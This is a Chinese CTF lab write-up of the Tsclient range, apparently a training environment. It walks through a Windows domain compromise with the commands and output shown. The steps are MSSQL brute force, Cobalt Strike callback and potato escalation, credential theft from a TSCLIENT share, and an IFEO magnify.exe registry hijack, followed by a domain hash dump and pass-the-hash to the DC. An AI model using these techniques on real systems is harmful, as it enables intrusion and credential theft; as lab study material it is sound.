打靶 - 春秋云境 - Tsclient

image

Mssql

扫全端口发现爆出Mssql的弱口令直接上提权工具执行命令

image

1
[+] [brute] sqlserver 39.98.124.158 1433 sa 1qaz!QAZ

image

Powershell一句话上线CS

image

烂土豆提权

CS自带的提权工具都不行,测试传了一个SweetPotato​发现缺成功了,真奇怪

image

确实离谱,传个马上去利用system再次执行一遍即可成功上线system

查看IP

image

查看用户

image

加了个用户进RDP拿到第一个flag

image

上传fscan打C段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
[=] Load Success
[=] icmp alive
[=] dial ip4:icmp 127.0.0.1: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
[=] IP: 172.22.8.15 alive
[=] IP: 172.22.8.31 alive
[=] IP: 172.22.8.18 alive
[=] IP: 172.22.8.46 alive
[=] 执行时间:3.61037s
[=] =========================
[=] 172.22.8.15:139 open NetBiosFile
[=] 172.22.8.15:445 open smb
[=] 172.22.8.15
  [>] DC01            Workstation Service
  [>] XIAORANG        Domain Name
  [>] XIAORANG        Domain Controllers
  [>] DC01            Server Service
  [>] XIAORANG        Domain Master Browser
[=] 172.22.8.31:445 open smb
[=] 172.22.8.31:139 open NetBiosFile
[=] 172.22.8.31
  [>] WIN19-CLIENT    Workstation Service
  [>] XIAORANG        Domain Name
  [>] WIN19-CLIENT    Server Service
[=] 172.22.8.15:88 open unknown/tcp
[=] 172.22.8.18:80 open http
[=] [web] http://172.22.8.18:80 | [IIS Windows Server] | [len:703] | [code:200] | [finger: Microsoft IIS | ]
[=] 172.22.8.18:445 open smb
[=] 172.22.8.18:139 open NetBiosFile
[=] 172.22.8.46:80 open http
[=] [web] http://172.22.8.46:80 | [IIS Windows Server] | [len:703] | [code:200] | [finger: Microsoft IIS | ]
[=] 172.22.8.46:445 open smb
[=] 172.22.8.46:139 open NetBiosFile
[=] 172.22.8.46
  [>] XIAORANG        Domain Name
  [>] WIN2016         Workstation Service
  [>] WIN2016         Server Service
[=] 172.22.8.15:135 open rpc
[=] 172.22.8.15:53 open dns
[=] 172.22.8.15:3389 open tls/rdp
[=] 172.22.8.18:1433 open mssql
[=] 172.22.8.31:135 open rpc
[=] 172.22.8.31:3389 open tls/rdp
[+] [brute] sqlserver 172.22.8.18 1433 sa 1qaz!QAZ
[=] 172.22.8.18:135 open rpc
[=] 172.22.8.46:135 open rpc
[=] 172.22.8.18:3389 open tls/rdp
[=] 172.22.8.46:3389 open tls/rdp
[=] end......

那么从上面来看是存在域的,并且存货的IP为

  • 172.22.8.31 域内主机

  • 172.22.8.46 域内主机

  • 172.22.8.15 DC

共享服务

那么现在就是打域内主机,回想到之前是看到有一个特殊用户john​的(既然给了用户肯定有他的作用)而且在上面的扫描工具当中发现本机开放了445跟139端口,猜测存在共享服务

所以就是去在CS上以其他用户上线进行进程注入

image

成功上线后查看一下共享服务

1
2
3
net use
dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt

image

image

发现给了一个域内用户密码,那么又因为刚才扫到是都开放了3389,则上代理去连域内主机的RDP即可

1
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

发现说是密码过期要更新密码

image

那只能上cmb去密码喷射了

image

发现SMB也是密码过期,于是可以使用smb去修改密码

1
proxychains python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'admin@123'

image

Smb修改密码

那么重新去登录一遍

发现直接登录DC是不可行的(可行都起飞了)

image

172.22.8.31

image

发现172.22.8.46是可以登录进去的,由于还需要横两台主机,所以在这里先进行转发上线

image

放大镜提权

上线后尝试了一下常规提权想抓取hash,但是都失败了,后续看了一下别人的wp,发现这里用到的是放大镜提权

1
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
PS C:\Users\Aldrich\Desktop> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Opti
ons" | fl *


PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion
PSChildName             : Image File Execution Options
PSDrive                 : HKLM
PSProvider              : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId   :
CentralAccessPolicyName :
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
                          ersion\Image File Execution Options
Owner                   : NT AUTHORITY\SYSTEM
Group                   : NT AUTHORITY\SYSTEM
Access                  : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAcce
                          ssRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.Regis
                          tryAccessRule...}
Sddl                    : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;B
                          U)(A;CI;KR;;;AC)
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
AuditToString           :
AccessRightType         : System.Security.AccessControl.RegistryRights
AccessRuleType          : System.Security.AccessControl.RegistryAccessRule
AuditRuleType           : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected  : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical  : True

重点关注这个内容

1
2
3
4
5
6
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey

其实这里可以理解为Linux中的SUID ,就是这个他这个登录用户是可以修改注册表的权限,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

image

点开就是system权限了,执行一下转发上线的木马即可上CS

image

image

PTH

紧接着因为已经是system权限了,于是就抓取hash密码看看是否存在域管的hash

image

发现已经抓到域管的hash,直接PTH横向DC即可

1
2
3
4
5
6
7
8
9
10
11
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	3ffd5b58b4a6328659a606c3ea6f9b63	514
1000	DC01$	edfd9bc7f992b46770192ac2061e779b	532480
500	Administrator	2c9d81bdcf3ec8b1def10328a7cc2f08	512
1103	WIN2016$	afd15b54cb6656a397256e0ee0edf5aa	16781312
1104	WIN19-CLIENT$	673fb89e10d575157b694e94b0bfff1b	16781312
1105	Aldrich	579da618cfbfa85247acf1f800a280a4	512

1
proxychains python3 smbexec.py xiaorang.lab/administrator@172.22.8.15 -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08

image

打靶
#打靶
打靶 - 春秋云境 - Tsclient
https://zjackky.github.io/post/spring-and-autumn-clouds-tsclient-z1fb7zo.html
作者
Zjacky
发布于
2023年12月13日
许可协议